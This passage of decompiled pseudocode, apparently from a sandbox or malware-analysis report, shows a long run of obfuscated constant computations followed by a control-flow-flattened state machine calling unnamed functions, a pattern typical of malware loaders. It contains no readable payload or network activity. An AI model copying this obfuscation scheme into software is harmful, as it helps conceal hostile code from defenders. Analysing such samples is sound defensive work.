                                          				_v508 = _v508 / _t1358;
                                          				_v508 = _v508 * 0x5a;
                                          				_v508 = _v508 ^ 0x00003cc0;
                                          				_v472 = 0x196b;
                                          				_v472 = _v472 * 0x16;
                                          				_v472 = _v472 + 0x8cdc;
                                          				_v472 = _v472 ^ 0x6344539c;
                                          				_v472 = _v472 ^ 0x6346dd33;
                                          				_v212 = 0xb705;
                                          				_v212 = _v212 << 7;
                                          				_v212 = _v212 ^ 0x005bff43;
                                          				_v312 = 0xb48f;
                                          				_v312 = _v312 + 0xffff701f;
                                          				_v312 = _v312 >> 0xa;
                                          				_v312 = _v312 ^ 0x00001302;
                                          				_v480 = 0xed6e;
                                          				_v480 = _v480 | 0x6be3eced;
                                          				_v480 = _v480 + 0x4979;
                                          				_v480 = _v480 ^ 0x6be47f6f;
                                          				_v204 = 0xd35b;
                                          				_v204 = _v204 >> 8;
                                          				_v204 = _v204 ^ 0x00000622;
                                          				_v456 = 0xd2fa;
                                          				_v456 = _v456 << 3;
                                          				_v456 = _v456 + 0xffffd4b1;
                                          				_v456 = _v456 << 4;
                                          				_v456 = _v456 ^ 0x0066f5d7;
                                          				_v464 = 0x5ee1;
                                          				_v464 = _v464 >> 9;
                                          				_v464 = _v464 | 0xf1defbea;
                                          				_v464 = _v464 ^ 0xf1de88d3;
                                          				_v304 = 0x5962;
                                          				_v304 = _v304 ^ 0xf5db8de9;
                                          				_v304 = _v304 | 0xcdcbde78;
                                          				_v304 = _v304 ^ 0xfddba732;
                                          				_v196 = 0xf258;
                                          				_v196 = _v196 << 7;
                                          				_v196 = _v196 ^ 0x007971a7;
                                          				_v448 = 0xfcbd;
                                          				_v448 = _v448 | 0x39b7afc5;
                                          				_v448 = _v448 * 0x70;
                                          				_v448 = _v448 | 0x0e40c0bc;
                                          				_v448 = _v448 ^ 0x4e7fac25;
                                          				_v412 = 0x82bf;
                                          				_v412 = _v412 | 0xb02f6e2d;
                                          				_v412 = _v412 + 0xffff8626;
                                          				_v412 = _v412 ^ 0xb02f1cac;
                                          				_v396 = 0xa4bf;
                                          				_v396 = _v396 ^ 0xb063c23f;
                                          				_v396 = _v396 >> 0xf;
                                          				_v396 = _v396 ^ 0x00011327;
                                          				_v592 = 0x3de9;
                                          				_v592 = _v592 + 0xffff189b;
                                          				_v592 = _v592 * 0x3e;
                                          				_v592 = _v592 + 0xffff8de2;
                                          				_v592 = _v592 ^ 0xffd6d64a;
                                          				_v404 = 0x86b0;
                                          				_v404 = _v404 >> 5;
                                          				_v404 = _v404 | 0x66bae114;
                                          				_v404 = _v404 ^ 0x66bacebe;
                                          				_v268 = 0x5937;
                                          				_v268 = _v268 + 0xb57c;
                                          				_v268 = _v268 ^ 0x00015145;
                                          				_v280 = 0x9a1f;
                                          				_v280 = _v280 + 0xffffa2eb;
                                          				_v280 = _v280 ^ 0x000041dd;
                                          				_v572 = 0xebd0;
                                          				_v572 = _v572 ^ 0xedb0bf00;
                                          				_t1359 = 0x32;
                                          				_v572 = _v572 / _t1359;
                                          				_v572 = _v572 << 1;
                                          				_v572 = _v572 ^ 0x09819433;
                                          				_v468 = 0x3364;
                                          				_v468 = _v468 + 0xffff353c;
                                          				_v468 = _v468 + 0x9f63;
                                          				_v468 = _v468 | 0x0336228b;
                                          				_v468 = _v468 ^ 0x0336362e;
                                          				_v580 = 0x8c54;
                                          				_v580 = _v580 | 0xf7fe7ffd;
                                          				_v580 = _v580 << 2;
                                          				_v580 = _v580 ^ 0xdffb9211;
                                          				_v400 = 0xc44;
                                          				_v400 = _v400 | 0x703220aa;
                                          				_v400 = _v400 + 0x556b;
                                          				_v400 = _v400 ^ 0x70328daf;
                                          				_v316 = 0xc625;
                                          				_t1360 = 0x2f;
                                          				_v316 = _v316 / _t1360;
                                          				_v316 = _v316 | 0xad0f9139;
                                          				_v316 = _v316 ^ 0xad0f9a77;
                                          				_v352 = 0x3bfc;
                                          				_v352 = _v352 ^ 0x3d91e4fd;
                                          				_v352 = _v352 << 4;
                                          				_v352 = _v352 ^ 0xd91d9102;
                                          				_v188 = 0xbf9d;
                                          				_v188 = _v188 ^ 0xeb169de8;
                                          				_v188 = _v188 ^ 0xeb160ae0;
                                          				_v272 = 0xf610;
                                          				_v272 = _v272 >> 0xc;
                                          				_v272 = _v272 ^ 0x000001f5;
                                          				_v500 = 0xa952;
                                          				_v500 = _v500 ^ 0x762f8db9;
                                          				_t1361 = 0x7b;
                                          				_v500 = _v500 * 0x6e;
                                          				_v500 = _v500 | 0x4a766c6e;
                                          				_v500 = _v500 ^ 0xca77b322;
                                          				_v420 = 0xb3ce;
                                          				_v420 = _v420 | 0x5d2bbb9b;
                                          				_v420 = _v420 + 0x97cf;
                                          				_v420 = _v420 ^ 0x5d2c523b;
                                          				_v276 = 0x9f6f;
                                          				_v276 = _v276 + 0x6bc4;
                                          				_v276 = _v276 ^ 0x00010aa4;
                                          				_v504 = 0x2102;
                                          				_v504 = _v504 >> 7;
                                          				_v504 = _v504 + 0xffff0b4b;
                                          				_v504 = _v504 << 4;
                                          				_v504 = _v504 ^ 0xfff0cd66;
                                          				_v320 = 0xeb7e;
                                          				_v320 = _v320 / _t1361;
                                          				_v320 = _v320 << 0xc;
                                          				_v320 = _v320 ^ 0x001ed973;
                                          				_v512 = 0x61aa;
                                          				_v512 = _v512 | 0xfdc9feff;
                                          				_t1362 = 0x42;
                                          				_v512 = _v512 / _t1362;
                                          				_v512 = _v512 ^ 0x03d81aae;
                                          				_v540 = 0x929f;
                                          				_t1363 = 3;
                                          				_v540 = _v540 * 0x59;
                                          				_v540 = _v540 ^ 0xd582cfd5;
                                          				_v540 = _v540 + 0xffff6c6f;
                                          				_v540 = _v540 ^ 0xd5af900c;
                                          				_v332 = 0xd4e0;
                                          				_v332 = _v332 | 0xf04e42e2;
                                          				_v332 = _v332 ^ 0xcda3b68f;
                                          				_v332 = _v332 ^ 0x3ded4bfa;
                                          				_v192 = 0xb136;
                                          				_v192 = _v192 >> 6;
                                          				_v192 = _v192 ^ 0x00000257;
                                          				_v460 = 0xb4b8;
                                          				_v460 = _v460 + 0xffff8599;
                                          				_v460 = _v460 / _t1363;
                                          				_v460 = _v460 + 0x6faa;
                                          				_v460 = _v460 ^ 0x0000d8b1;
                                          				_v548 = 0x6ab8;
                                          				_t1364 = 0x7c;
                                          				_v548 = _v548 * 0x71;
                                          				_v548 = _v548 / _t1364;
                                          				_v548 = _v548 << 4;
                                          				_v548 = _v548 ^ 0x00063121;
                                          				_v260 = 0x579;
                                          				_v260 = _v260 >> 0xd;
                                          				_v260 = _v260 ^ 0x00001a36;
                                          				_v380 = 0x5d49;
                                          				_t1365 = 0x3a;
                                          				_v380 = _v380 * 0x2a;
                                          				_v380 = _v380 << 0xf;
                                          				_v380 = _v380 ^ 0xa6fd05f8;
                                          				_v584 = 0x9575;
                                          				_v584 = _v584 << 0xe;
                                          				_v584 = _v584 >> 0xb;
                                          				_v584 = _v584 >> 9;
                                          				_v584 = _v584 ^ 0x00001953;
                                          				_v388 = 0x71ed;
                                          				_v388 = _v388 | 0xfa0f4c1a;
                                          				_v388 = _v388 * 0x21;
                                          				_v388 = _v388 ^ 0x3bff2db3;
                                          				_v576 = 0x40ac;
                                          				_v576 = _v576 ^ 0x72872e3c;
                                          				_v576 = _v576 >> 3;
                                          				_v576 = _v576 >> 6;
                                          				_v576 = _v576 ^ 0x00395cc8;
                                          				_v356 = 0x9a14;
                                          				_v356 = _v356 * 5;
                                          				_v356 = _v356 / _t1365;
                                          				_v356 = _v356 ^ 0x00000d15;
                                          				_v364 = 0x97d4;
                                          				_v364 = _v364 + 0xffff1281;
                                          				_v364 = _v364 << 0xd;
                                          				_v364 = _v364 ^ 0xf54ac276;
                                          				_v568 = 0x9f15;
                                          				_v568 = _v568 + 0xffff08f5;
                                          				_v568 = _v568 * 0x54;
                                          				_v568 = _v568 + 0x8411;
                                          				_v568 = _v568 ^ 0xffe3bf59;
                                          				_v372 = 0xb5ac;
                                          				_v372 = _v372 | 0xef292143;
                                          				_v372 = _v372 << 0xc;
                                          				_v372 = _v372 ^ 0x9b5ed191;
                                          				_v560 = 0xc079;
                                          				_v560 = _v560 << 6;
                                          				_v560 = _v560 | 0x75378a54;
                                          				_v560 = _v560 + 0xffff0fb6;
                                          				_v560 = _v560 ^ 0x7536a745;
                                          				_v252 = 0xffdd;
                                          				_v252 = _v252 ^ 0x94fd4b64;
                                          				_v252 = _v252 ^ 0x94fd9346;
                                          				_v344 = 0x2817;
                                          				_v344 = _v344 + 0xffffb9ce;
                                          				_v344 = _v344 >> 5;
                                          				_v344 = _v344 ^ 0x07ffc707;
                                          				_v544 = 0xc4c3;
                                          				_v544 = _v544 << 4;
                                          				_v544 = _v544 | 0xf37ee84d;
                                          				_v544 = _v544 >> 9;
                                          				_v544 = _v544 ^ 0x0079cb8a;
                                          				_v244 = 0xbe83;
                                          				_v244 = _v244 << 9;
                                          				_v244 = _v244 ^ 0x017d70fa;
                                          				_v552 = 0x87b1;
                                          				_v552 = _v552 + 0xe2ec;
                                          				_v552 = _v552 + 0xffff8757;
                                          				_t1366 = 0x57;
                                          				_v552 = _v552 / _t1366;
                                          				_v552 = _v552 ^ 0x00000cf8;
                                          				_v524 = 0x9ee8;
                                          				_v524 = _v524 >> 0xc;
                                          				_v524 = _v524 + 0xffffea20;
                                          				_v524 = _v524 + 0x67c2;
                                          				_v524 = _v524 ^ 0x0000257d;
                                          				_v240 = 0x3e44;
                                          				_t1367 = 0x4e;
                                          				_v240 = _v240 * 0x26;
                                          				_v240 = _v240 ^ 0x000944b9;
                                          				_v184 = 0xb17e;
                                          				_v184 = _v184 + 0xc83;
                                          				_v184 = _v184 ^ 0x00008468;
                                          				_v428 = 0x2247;
                                          				_v428 = _v428 >> 6;
                                          				_v428 = _v428 | 0xbf36a58a;
                                          				_v428 = _v428 ^ 0xbf36942e;
                                          				_v492 = 0xaf88;
                                          				_v492 = _v492 | 0x489e17bf;
                                          				_v492 = _v492 / _t1367;
                                          				_t1368 = 0x59;
                                          				_v492 = _v492 / _t1368;
                                          				_v492 = _v492 ^ 0x00028cc4;
                                          				_v236 = 0x579b;
                                          				_v236 = _v236 | 0x958cbadb;
                                          				_v236 = _v236 ^ 0x958cb114;
                                          				_v528 = 0x596e;
                                          				_t1369 = 0x25;
                                          				_v528 = _v528 / _t1369;
                                          				_v528 = _v528 + 0xffff0f20;
                                          				_v528 = _v528 * 0x71;
                                          				_v528 = _v528 ^ 0xff96cb88;
                                          				_v384 = 0xdb4f;
                                          				_v384 = _v384 / _t1340;
                                          				_v384 = _v384 ^ 0x047c7efe;
                                          				_v384 = _v384 ^ 0x047c6269;
                                          				_v256 = 0x2cf1;
                                          				_v256 = _v256 | 0x808b3cca;
                                          				_v256 = _v256 ^ 0x808b1c76;
                                          				_v300 = 0x3901;
                                          				_t1370 = 0x6d;
                                          				_v300 = _v300 * 0xa;
                                          				_v300 = _v300 >> 6;
                                          				_v300 = _v300 ^ 0x0000212b;
                                          				_v368 = 0x796e;
                                          				_v368 = _v368 * 0xc;
                                          				_v368 = _v368 * 0x3e;
                                          				_v368 = _v368 ^ 0x0160b691;
                                          				_v444 = 0xa0b9;
                                          				_v444 = _v444 | 0x9ca1dfa8;
                                          				_v444 = _v444 / _t1370;
                                          				_v444 = _v444 * 0x63;
                                          				_v444 = _v444 ^ 0x8e437e2f;
                                          				_v532 = 0x8c65;
                                          				_v532 = _v532 * 0x56;
                                          				_v532 = _v532 << 0xa;
                                          				_v532 = _v532 * 0x21;
                                          				_v532 = _v532 ^ 0x519e8d1f;
                                          				_v556 = 0x4a7f;
                                          				_v556 = _v556 << 0xf;
                                          				_v556 = _v556 + 0xa5c2;
                                          				_v556 = _v556 | 0xa1707f4f;
                                          				_v556 = _v556 ^ 0xa5705fb9;
                                          				_v436 = 0x3fda;
                                          				_v436 = _v436 * 0x3e;
                                          				_v436 = _v436 + 0x1364;
                                          				_v436 = _v436 ^ 0xe1573554;
                                          				_v436 = _v436 ^ 0xe158f097;
                                          				_v564 = 0x6043;
                                          				_v564 = _v564 | 0xb689377f;
                                          				_v564 = _v564 >> 8;
                                          				_v564 = _v564 ^ 0x2a62422c;
                                          				_v564 = _v564 ^ 0x2ad4e10a;
                                          				_v328 = 0x5c6e;
                                          				_v328 = _v328 ^ 0x42ae754b;
                                          				_v328 = _v328 + 0xbaa3;
                                          				_v328 = _v328 ^ 0x42aeef53;
                                          				_v228 = 0xef63;
                                          				_v228 = _v228 >> 0xe;
                                          				_v228 = _v228 ^ 0x00001997;
                                          				_v336 = 0x5044;
                                          				_v336 = _v336 >> 0xf;
                                          				_v336 = _v336 + 0xffffb35b;
                                          				_v336 = _v336 ^ 0xffffef5d;
                                          				_v440 = 0x7004;
                                          				_v440 = _v440 * 0x7e;
                                          				_v440 = _v440 * 0x13;
                                          				_v440 = _v440 << 0x10;
                                          				_v440 = _v440 ^ 0x85685bd2;
                                          				_v164 = 0x75ea;
                                          				_v164 = _v164 << 0xb;
                                          				_v164 = _v164 ^ 0x03af40f2;
                                          				_v224 = 0xc6cf;
                                          				_v224 = _v224 << 9;
                                          				_v224 = _v224 ^ 0x018dae64;
                                          				_v160 = 0xb450;
                                          				_t1371 = 0x38;
                                          				_v160 = _v160 / _t1371;
                                          				_v160 = _v160 ^ 0x00003b29;
                                          				_v476 = 0xddbc;
                                          				_v476 = _v476 ^ 0xc2407c95;
                                          				_v476 = _v476 + 0xd5a3;
                                          				_v476 = _v476 + 0x8192;
                                          				_v476 = _v476 ^ 0xc241f0f2;
                                          				_v216 = 0xdff2;
                                          				_t1372 = 0x2c;
                                          				_v216 = _v216 * 0x1c;
                                          				_v216 = _v216 ^ 0x00187743;
                                          				_v516 = 0x400b;
                                          				_v516 = _v516 / _t1218;
                                          				_v516 = _v516 + 0xc836;
                                          				_v516 = _v516 >> 0xa;
                                          				_v516 = _v516 ^ 0x00004f08;
                                          				_v292 = 0xdc4e;
                                          				_v292 = _v292 * 0x16;
                                          				_v292 = _v292 * 0x7f;
                                          				_v292 = _v292 ^ 0x09643e15;
                                          				_v600 = 0x4d46;
                                          				_v600 = _v600 + 0xffff0db8;
                                          				_v600 = _v600 + 0x84f3;
                                          				_v600 = _v600 + 0xc039;
                                          				_v600 = _v600 ^ 0x0000d5ed;
                                          				_v432 = 0x8bd1;
                                          				_v432 = _v432 << 0xc;
                                          				_v432 = _v432 + 0x8a22;
                                          				_v432 = _v432 / _t1372;
                                          				_v432 = _v432 ^ 0x003284c4;
                                          				_v288 = 0x245c;
                                          				_v288 = _v288 | 0x526859ae;
                                          				_v288 = _v288 * 0xc;
                                          				_v288 = _v288 ^ 0xdce5b0ef;
                                          				while(1) {
                                          					L1:
                                          					do {
                                          						while(1) {
                                          							L2:
                                          							_t1391 = _t1225 - 0x1bd1caec;
                                          							if(_t1391 <= 0) {
                                          							}
                                          							L3:
                                          							if(_t1391 == 0) {
                                          								__eflags = E006D02C3();
                                          								if(__eflags == 0) {
                                          									_t1135 = E006C7903();
                                          									asm("sbb ecx, ecx");
                                          									_t1225 = ( ~_t1135 & 0x0209e55e) + 0x3544b2a;
                                          									while(1) {
                                          										L2:
                                          										_t1391 = _t1225 - 0x1bd1caec;
                                          										if(_t1391 <= 0) {
                                          										}
                                          										goto L3;
                                          									}
                                          								}
                                          								_t1144 = E006C7903();
                                          								asm("sbb ecx, ecx");
                                          								_t1257 =  ~_t1144 & 0x03449ef9;
                                          								L32:
                                          								_t1225 = _t1257 + 0xda99535;
                                          								while(1) {
                                          									L2:
                                          									_t1391 = _t1225 - 0x1bd1caec;
                                          									if(_t1391 <= 0) {
                                          									}
                                          									goto L54;
                                          								}
                                          								goto L3;
                                          							}
                                          							_t1392 = _t1225 - 0x10ee342e;
                                          							if(_t1392 > 0) {
                                          								__eflags = _t1225 - 0x15603e6b;
                                          								if(__eflags > 0) {
                                          									__eflags = _t1225 - 0x159448ba;
                                          									if(_t1225 == 0x159448ba) {
                                          										E006CC562(_v540,  &_v80, _v332, _v192);
                                          										_t1225 = 0x17799f6a;
                                          										continue;
                                          									}
                                          									__eflags = _t1225 - 0x1653011b;
                                          									if(_t1225 == 0x1653011b) {
                                          										E006CF536(_v384, _v256, _v300, _v140);
                                          										_t1225 = 0x21caf663;
                                          										continue;
                                          									}
                                          									__eflags = _t1225 - 0x17799f6a;
                                          									if(_t1225 == 0x17799f6a) {
                                          										_t1138 = E006C9A37( &_v112,  &_v132, _v460, _v548);
                                          										asm("sbb ecx, ecx");
                                          										_t1225 = ( ~_t1138 & 0x1d975e2e) + 0x7ff6f9b;
                                          										continue;
                                          									}
                                          									__eflags = _t1225 - 0x1b19f75b;
                                          									if(_t1225 != 0x1b19f75b) {
                                          										break;
                                          									}
                                          									_t1144 = E006D73AC();
                                          									asm("sbb ecx, ecx");
                                          									_t1225 = ( ~_t1144 & 0x1b44a5c9) + 0x1bd1caec;
                                          									continue;
                                          								}
                                          								if(__eflags == 0) {
                                          									_t1144 = E006CF444(_t1225);
                                          									L112:
                                          									return _t1144;
                                          								}
                                          								__eflags = _t1225 - 0x10f69b27;
                                          								if(_t1225 == 0x10f69b27) {
                                          									_t1144 = E006DAB96();
                                          									_t1225 = 0x326a8235;
                                          									continue;
                                          								}
                                          								__eflags = _t1225 - 0x11454f34;
                                          								if(_t1225 == 0x11454f34) {
                                          									_t1144 = E006CD7EB();
                                          									_t1225 = 0x356cf65c;
                                          									continue;
                                          								}
                                          								__eflags = _t1225 - 0x11dfa862;
                                          								if(__eflags == 0) {
                                          									_t1225 = 0x376e2cde;
                                          									continue;
                                          								}
                                          								__eflags = _t1225 - 0x13c96655;
                                          								if(_t1225 != 0x13c96655) {
                                          									break;
                                          								}
                                          								_t1144 = E006C62A3();
                                          								goto L112;
                                          							}
                                          							if(_t1392 == 0) {
                                          								_t1140 = E006C153C();
                                          								asm("sbb ecx, ecx");
                                          								_t1257 =  ~_t1140 & 0x061fd120;
                                          								__eflags = _t1257;
                                          								goto L32;
                                          							}
                                          							_t1393 = _t1225 - 0x55e3088;
                                          							if(_t1393 > 0) {
                                          								__eflags = _t1225 - 0x7ff6f9b;
                                          								if(_t1225 == 0x7ff6f9b) {
                                          									_t1336 = _v436;
                                          									E006CF536(_v556, _t1336, _v564, _v80);
                                          									_t1225 = 0x3140af28;
                                          									continue;
                                          								}
                                          								__eflags = _t1225 - 0xb356ed5;
                                          								if(_t1225 == 0xb356ed5) {
                                          									_t1144 = E006CC2E2();
                                          									_v104 = _t1144;
                                          									_t1225 = 0x288da576;
                                          									continue;
                                          								}
                                          								__eflags = _t1225 - 0xd8c7d27;
                                          								if(_t1225 == 0xd8c7d27) {
                                          									_push( &_v68);
                                          									_t1336 = _v572;
                                          									_t1144 = E006D2349(_v280, _t1336, _v468, _v580, _t1225);
                                          									_t1387 = _t1387 + 0x10;
                                          									__eflags = _t1144;
                                          									if(__eflags == 0) {
                                          										L28:
                                          										_t1225 = 0x15603e6b;
                                          										continue;
                                          									}
                                          									_t1336 = _v316;
                                          									_v112 =  &_v68;
                                          									_t1144 = E006CDFE2(_v400, _t1336,  &_v68);
                                          									_v108 = _t1144;
                                          									_t1225 = 0x2267098;
                                          									continue;
                                          								}
                                          								__eflags = _t1225 - 0xda99535;
                                          								if(_t1225 != 0xda99535) {
                                          									break;
                                          								}
                                          								E006D7D03();
                                          								_t1144 = E006C8317();
                                          								L25:
                                          								_t1225 = 0x23233137;
                                          								continue;
                                          							}
                                          							if(_t1393 == 0) {
                                          								_t1144 = E006D63C1();
                                          								_t1225 = 0x3544b2a;
                                          								continue;
                                          							}
                                          							if(_t1225 == 0x13a2b08) {
                                          								_t1225 = 0x282d346f;
                                          								continue;
                                          							}
                                          							if(_t1225 == 0x2267098) {
                                          								_t1144 = E006D611C();
                                          								_v72 = _t1144;
                                          								_t1225 = 0xb356ed5;
                                          								continue;
                                          							}
                                          							if(_t1225 == 0x2a32d0a) {
                                          								_t1225 = 0x34a6f88;
                                          								continue;
                                          							}
                                          							if(_t1225 == 0x34a6f88) {
                                          								_t1144 = E006D3632(__eflags);
                                          								__eflags = _t1144;
                                          								if(__eflags == 0) {
                                          									goto L112;
                                          								} else {
                                          									_t1225 = 0x3833d453;
                                          									continue;
                                          								}
                                          							}
                                          							if(_t1225 != 0x3544b2a) {
                                          								break;
                                          							} else {
                                          								_t1144 = E006D1BDF();
                                          								_t1225 = 0x371670b5;
                                          								continue;
                                          							}
                                          							L54:
                                          							__eflags = _t1225 - 0x2e6b2744;
                                          							if(__eflags > 0) {
                                          								__eflags = _t1225 - 0x35bdcd5f;
                                          								if(__eflags > 0) {
                                          									__eflags = _t1225 - 0x371670b5;
                                          									if(_t1225 == 0x371670b5) {
                                          										E006D8F49();
                                          										_t1225 = 0x30491502;
                                          										break;
                                          									}
                                          									__eflags = _t1225 - 0x376e2cde;
                                          									if(__eflags == 0) {
                                          										_v148 = E006CF85D(_v472, __eflags,  &_v144, _v212, _v312, _v480);
                                          										E006C48BD( &_v148, _v204, _v456, _v464);
                                          										_t1387 = _t1387 + 0x18;
                                          										_t1336 = _v148;
                                          										E006D2025(_v304, _t1336, _v196, _v448);
                                          										_t1225 = 0x13a2b08;
                                          										continue;
                                          									}
                                          									__eflags = _t1225 - 0x37f9587b;
                                          									if(__eflags == 0) {
                                          										_v96 = 0x1346150;
                                          										_t1225 = 0x2e6b2744;
                                          										continue;
                                          									}
                                          									__eflags = _t1225 - 0x3833d453;
                                          									if(_t1225 != 0x3833d453) {
                                          										break;
                                          									}
                                          									_t1144 = E006D6014(); // executed
                                          									_t1225 = 0x1e57e2ba;
                                          									continue;
                                          								}
                                          								if(__eflags == 0) {
                                          									_t1336 = _v320;
                                          									_t1144 = E006DA0AF(_v504, _t1336, _v512,  &_v88);
                                          									_t1225 = 0x159448ba;
                                          									continue;
                                          								}
                                          								__eflags = _t1225 - 0x30491502;
                                          								if(_t1225 == 0x30491502) {
                                          									_t1144 = E006CEE78();
                                          									__eflags = _t1144;
                                          									if(__eflags == 0) {
                                          										goto L112;
                                          									}
                                          									_t1225 = 0x2a91822d;
                                          									continue;
                                          								}
                                          								__eflags = _t1225 - 0x3140af28;
                                          								if(_t1225 == 0x3140af28) {
                                          									_t1336 = _v228;
                                          									_t1144 = E006CF536(_v328, _t1336, _v336, _v88);
                                          									goto L25;
                                          								}
                                          								__eflags = _t1225 - 0x326a8235;
                                          								if(__eflags == 0) {
                                          									_t1336 =  &_v124;
                                          									_t1144 = E006D71EF(_t1336, __eflags, _v528);
                                          									__eflags = _t1144;
                                          									if(__eflags != 0) {
                                          										asm("xorps xmm0, xmm0");
                                          										asm("movlpd [esp+0x1d0], xmm0");
                                          									}
                                          									L95:
                                          									_t1225 = 0x1653011b;
                                          									continue;
                                          								}
                                          								__eflags = _t1225 - 0x356cf65c;
                                          								if(_t1225 != 0x356cf65c) {
                                          									break;
                                          								}
                                          								_t1144 = E006D67F0();
                                          								_t1225 = 0x13c96655;
                                          								continue;
                                          							}
                                          							if(__eflags == 0) {
                                          								_v92 = 0x1388;
                                          								_t1225 = 0x35bdcd5f;
                                          								continue;
                                          							}
                                          							__eflags = _t1225 - 0x23233137;
                                          							if(__eflags > 0) {
                                          								__eflags = _t1225 - 0x2596cdc9;
                                          								if(_t1225 == 0x2596cdc9) {
                                          									_push(_v388);
                                          									_push(_v584);
                                          									_push(_v380);
                                          									_t1336 = _v260;
                                          									_push( &_v132);
                                          									_push( &_v140);
                                          									_t1172 = E006C9FDC(_t1336);
                                          									_t1389 = _t1387 + 0x14;
                                          									__eflags = _t1172;
                                          									if(_t1172 == 0) {
                                          										E006C790F();
                                          										E006C78A5(_t1225, _t1225, 0x1f40, _t1225, 0xfa0);
                                          										_t1387 = _t1389 + 0x10;
                                          										_t1144 = E006C8317();
                                          										_t1225 = 0x21caf663;
                                          										asm("adc ebx, 0x0");
                                          									} else {
                                          										_t1384 = 0x35bdcd5f;
                                          										_t1213 = E006C78A5(_t1225, _t1225, 0xef420, _t1225, 0xdbba0);
                                          										_t1387 = _t1389 + 0x10;
                                          										_t1144 = E006C8317();
                                          										_t1224 = _t1336;
                                          										_t1348 = _t1144 + _t1213;
                                          										_t1225 = 0x21c9d3c7;
                                          										asm("adc ebx, 0x0");
                                          									}
                                          									while(1) {
                                          										L1:
                                          										goto L2;
                                          									}
                                          								}
                                          								__eflags = _t1225 - 0x282d346f;
                                          								if(_t1225 == 0x282d346f) {
                                          									_t1384 = 0xd8c7d27;
                                          									_t1186 = E006C78A5(_t1225, _t1225, 0x2ee0, _t1225, 0xfa0);
                                          									_t1387 = _t1387 + 0x10;
                                          									_t1144 = E006C8317();
                                          									_t1224 = _t1336;
                                          									_t1348 = _t1144 + _t1186;
                                          									_t1225 = 0x23233137;
                                          									asm("adc ebx, 0x0");
                                          									goto L1;
                                          								}
                                          								__eflags = _t1225 - 0x288da576;
                                          								if(_t1225 == 0x288da576) {
                                          									_t1144 = E006CF326();
                                          									_v100 = _t1144;
                                          									_t1225 = 0x37f9587b;
                                          									continue;
                                          								}
                                          								__eflags = _t1225 - 0x2a91822d;
                                          								if(_t1225 != 0x2a91822d) {
                                          									break;
                                          								}
                                          								E006D3895();
                                          								_t1144 = E006C7903();
                                          								asm("sbb ecx, ecx");
                                          								_t1225 = ( ~_t1144 & 0xdbd858d8) + 0x356cf65c;
                                          								continue;
                                          							}
                                          							if(__eflags == 0) {
                                          								_t1144 = _t1348 | _t1224;
                                          								__eflags = _t1144;
                                          								if(_t1144 != 0) {
                                          									_t1199 = E006C78A5(_t1225, _t1225, 0x4b0, _t1225, 0x190);
                                          									_t1387 = _t1387 + 8;
                                          									_t1336 = _t1199;
                                          									_t1144 = E006D3F62(_t1336, __eflags);
                                          									__eflags = _t1144;
                                          									if(__eflags != 0) {
                                          										goto L28;
                                          									}
                                          									_t1144 = E006C8317();
                                          									__eflags = _t1336 - _t1224;
                                          									if(__eflags < 0) {
                                          										L74:
                                          										_t1225 = 0x23233137;
                                          										break;
                                          									}
                                          									if(__eflags > 0) {
                                          										goto L69;
                                          									}
                                          									__eflags = _t1144 - _t1348;
                                          									if(_t1144 >= _t1348) {
                                          										goto L69;
                                          									}
                                          									goto L74;
                                          								}
                                          								L69:
                                          								_t1225 = _t1384;
                                          								break;
                                          							}
                                          							__eflags = _t1225 - 0x1d55cf6f;
                                          							if(_t1225 == 0x1d55cf6f) {
                                          								_t1144 = E006D12E2();
                                          								goto L112;
                                          							}
                                          							__eflags = _t1225 - 0x1e57e2ba;
                                          							if(_t1225 == 0x1e57e2ba) {
                                          								_t1144 = E006D4B41();
                                          								__eflags = _t1144;
                                          								if(_t1144 == 0) {
                                          									goto L112;
                                          								}
                                          								_t1144 = E006D84C4(_v360);
                                          								_t1225 = 0x1b19f75b;
                                          								continue;
                                          							}
                                          							__eflags = _t1225 - 0x21c9d3c7;
                                          							if(_t1225 == 0x21c9d3c7) {
                                          								_t1336 = _v524;
                                          								_t1144 = E006D3FE7( &_v124, _t1336, _v240,  &_v140);
                                          								__eflags = _t1144;
                                          								if(__eflags == 0) {
                                          									goto L95;
                                          								}
                                          								_t1144 = E006D67E9();
                                          								__eflags = _v116;
                                          								_t1225 = 0x10f69b27;
                                          								if(__eflags != 0) {
                                          									__eflags = _v116 - 7;
                                          									_t1225 =  ==  ? 0x1d55cf6f : 0x10f69b27;
                                          								}
                                          								continue;
                                          							}
                                          							__eflags = _t1225 - 0x21caf663;
                                          							if(_t1225 != 0x21caf663) {
                                          								break;
                                          							}
                                          							_t1336 = _v444;
                                          							_t1144 = E006CF536(_v368, _t1336, _v532, _v132);
                                          							_t1225 = 0x7ff6f9b;
                                          						}
                                          						__eflags = _t1225 - 0x3adf5394;
                                          					} while (__eflags != 0);
                                          					goto L112;
                                          				}
                                          			}

                                          0x006c2f30
                                          0x006c2f37
                                          0x006c2f42
                                          0x006c2f4d
                                          0x006c2f58
                                          0x006c2f6e
                                          0x006c2f75
                                          0x006c2f80
                                          0x006c2f8b
                                          0x006c2f96
                                          0x006c2fa1
                                          0x006c2fac
                                          0x006c2fb7
                                          0x006c2fbf
                                          0x006c2fca
                                          0x006c2fd2
                                          0x006c2fda
                                          0x006c2fdf
                                          0x006c2fe7
                                          0x006c2fef
                                          0x006c2ffa
                                          0x006c3005
                                          0x006c3010
                                          0x006c3025
                                          0x006c302c
                                          0x006c3037
                                          0x006c3042
                                          0x006c304d
                                          0x006c3058
                                          0x006c3063
                                          0x006c3076
                                          0x006c307d
                                          0x006c3088
                                          0x006c3093
                                          0x006c309e
                                          0x006c30a9
                                          0x006c30b4
                                          0x006c30c6
                                          0x006c30c9
                                          0x006c30d0
                                          0x006c30db
                                          0x006c30e6
                                          0x006c30f3
                                          0x006c30f7
                                          0x006c30ff
                                          0x006c3104
                                          0x006c310c
                                          0x006c3117
                                          0x006c3122
                                          0x006c312d
                                          0x006c3138
                                          0x006c314b
                                          0x006c3154
                                          0x006c315f
                                          0x006c3167
                                          0x006c316f
                                          0x006c3177
                                          0x006c317c
                                          0x006c3184
                                          0x006c3192
                                          0x006c3197
                                          0x006c31a1
                                          0x006c31a4
                                          0x006c31ad
                                          0x006c31b1
                                          0x006c31b9
                                          0x006c31cc
                                          0x006c31d3
                                          0x006c31de
                                          0x006c31e9
                                          0x006c31f4
                                          0x006c31ff
                                          0x006c3207
                                          0x006c3212
                                          0x006c321d
                                          0x006c3228
                                          0x006c3230
                                          0x006c323b
                                          0x006c3246
                                          0x006c3251
                                          0x006c325c
                                          0x006c3267
                                          0x006c3272
                                          0x006c327a
                                          0x006c3285
                                          0x006c3290
                                          0x006c3298
                                          0x006c32a3
                                          0x006c32ab
                                          0x006c32b6
                                          0x006c32c1
                                          0x006c32c9
                                          0x006c32d4
